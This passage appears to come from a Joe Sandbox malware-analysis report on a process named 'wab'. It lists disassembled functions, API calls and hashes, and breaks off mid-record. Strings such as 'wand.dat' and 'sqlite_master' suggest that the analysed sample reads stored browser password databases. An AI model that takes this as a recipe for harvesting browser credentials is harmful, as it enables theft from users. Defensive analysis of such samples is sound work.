                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.*$dat$wand.dat
                                          • API String ID: 2618321458-1828844352
                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                          • wcslen.MSVCRT ref: 00410C74
                                          • _wtoi.MSVCRT ref: 00410C80
                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                          • String ID:
                                          • API String ID: 1549203181-0
                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00412057
                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                          • String ID:
                                          • API String ID: 3550944819-0
                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                          Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                          • memcpy.MSVCRT ref: 0040A94F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 3023356884-0
                                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                          Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 0040B1DE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                          • memcpy.MSVCRT ref: 0040B248
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 3023356884-0
                                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          • API String ID: 3510742995-2766056989
                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID:
                                          • API String ID: 1865533344-0
                                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                          Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 0040B0D8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                          • memcpy.MSVCRT ref: 0040B159
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004144E7
                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                          • memset.MSVCRT ref: 0041451A
                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                          • String ID:
                                          • API String ID: 1127616056-0
                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: sqlite_master
                                          • API String ID: 438689982-3163232059
                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                          • wcscpy.MSVCRT ref: 00414DF3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                          • String ID:
                                          • API String ID: 3917621476-0
                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                          • _snwprintf.MSVCRT ref: 00410FE1
                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • _snwprintf.MSVCRT ref: 0041100C
                                          • wcscat.MSVCRT ref: 0041101F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                          • String ID:
                                          • API String ID: 822687973-0
                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                          • malloc.MSVCRT ref: 00417459
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@malloc
                                          • String ID:
                                          • API String ID: 4284152360-0
                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                          • RegisterClassW.USER32(?), ref: 00412428
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                          • String ID:
                                          • API String ID: 2678498856-0
                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$Item
                                          • String ID:
                                          • API String ID: 3888421826-0
                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00417B7B
                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                          • GetLastError.KERNEL32 ref: 00417BB5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastLockUnlockmemset
                                          • String ID:
                                          • API String ID: 3727323765-0
                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                          Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                          • malloc.MSVCRT ref: 00417407
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@malloc
                                          • String ID:
                                          • API String ID: 4284152360-0
                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040F673
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                          • strlen.MSVCRT ref: 0040F6A2
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040F6E2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                          • strlen.MSVCRT ref: 0040F70D
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00402FD7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                          • strlen.MSVCRT ref: 00403006
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                          • String ID:
                                          • API String ID: 764393265-0
                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Time$System$File$LocalSpecific
                                          • String ID:
                                          • API String ID: 979780441-0
                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT ref: 004134E0
                                          • memcpy.MSVCRT ref: 004134F2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$DialogHandleModuleParam
                                          • String ID:
                                          • API String ID: 1386444988-0
                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
